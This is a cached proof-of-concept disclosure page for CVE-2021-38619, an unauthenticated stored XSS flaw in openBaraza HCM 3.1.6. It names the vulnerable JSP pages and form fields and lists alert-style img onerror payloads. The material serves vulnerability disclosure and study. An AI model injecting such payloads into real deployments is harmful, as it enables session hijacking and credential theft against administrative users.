Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-38619 PoC — openBaraza HCM 跨站脚本漏洞

Source
Associated Vulnerability
Title:openBaraza HCM 跨站脚本漏洞 (CVE-2021-38619)
Description:openBaraza HCM是一个全面的人力资源和人才管理软件解决方案,不仅包含传统的核心人力资源功能,还包含人才管理的关键方面。 openBaraza HCM 存在跨站脚本漏洞,该漏洞源于 openBaraza HCM 没有正确转义用户的输入。未经身份验证的远程攻击者可以从 hr/subscription.jsp 和 hr/application.jsp 和 hr/index.jsp 对管理用户进行存储跨站点脚本 (XSS) 攻击。
Readme
# CVE-2021-38619 openBaraza HCM HR Payroll v.3.1.6 Unauthenticated Stored XSS Vulnerability

openBaraza HCM v.3.1.6 does not properly neutralize user-controllable input, this could allow an unauthenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user from multiple pages. If an attacker injects arbitray javascript payload into vulnerable pages and valid users attempt to visit affected pages the payload will be executed. This could result in stealing credentials, session hijacking, or delivering malware to the victim.


Discoverer credits: Charles Bickel & Gideon Gray

---
Vulnerable page:
http://serverip:9090/hr/application.jsp

Vulnerable textboxes:
first_name, surname, email

Payloads:
* <img src='x'onerror="alert('First');" />
* <img src='x'onerror="alert('Surname');" />
* a@a.com<img src='x'onerror="alert('email');" />

Affected page:
http://serverip:9090/hr/index.jsp?view=23:0


![application.jsp](https://raw.githubusercontent.com/charlesbickel/CVE/main/2021-08-12_23-27-23.gif)


---
Vulnerable page:
http://serverip:9090/hr/subscription.jsp

Vulnerable textboxes:
business_name, primary_contact, primary_email, confirm_email

Payloads:
* <img src='x'onerror="alert('business');" />
* <img src='x'onerror="alert('contact');" />
* <img src='x'onerror="alert('email');" />

Affected page:
http://serverip:9090/hr/index.jsp?view=94:0

![subscription.jsp](https://raw.githubusercontent.com/charlesbickel/CVE/main/2021-08-12_23-21-34.gif)
File Snapshot

[4.0K] /data/pocs/318b492c82fc795d632b98d5050dd1ea738a7acd ├── [827K] 2021-08-12_23-21-34.gif ├── [786K] 2021-08-12_23-27-23.gif └── [1.5K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.